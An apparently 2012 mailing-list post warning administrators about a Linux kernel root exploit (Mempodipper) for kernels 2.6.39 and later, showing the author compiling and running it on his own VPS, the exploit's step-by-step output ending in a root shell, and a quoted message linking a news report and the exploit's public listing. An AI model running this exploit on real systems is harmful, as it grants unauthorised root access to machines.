[SP-pm] [OFF] Linux Kernel Privilege Escalation >= 2.6.39
Daniel Mantovani
daniel.oliveira.mantovani at gmail.com
Fri Jan 27 06:04:31 PST 2012
I just tested it on my VPS,
mantovani em mantovanilabs:~$ gcc mempodipper.c
mantovani em mantovanilabs:~$ ls
a.out apps mempodipper.c Perl perl5
mantovani em mantovanilabs:~$ chmod +x a.out
mantovani em mantovanilabs:~$ ./a.out
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x4020b8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/16574/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x4020ac.
[+] Executing su with shellcode.
# uname -a
Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01 EDT 2011 x86_64 GNU/Linux
--
Software Engineer
Just Another Perl Hacker
Daniel Mantovani +5511 8538-9897
XOXO
On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:
> http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge
> the exploit, http://www.exploit-db.com/exploits/18411/
>
> Attention administrators, the matter is serious.
>
>
> --
> Software Engineer
> Just Another Perl Hacker
> Daniel Mantovani +5511 8538-9897
> XOXO
>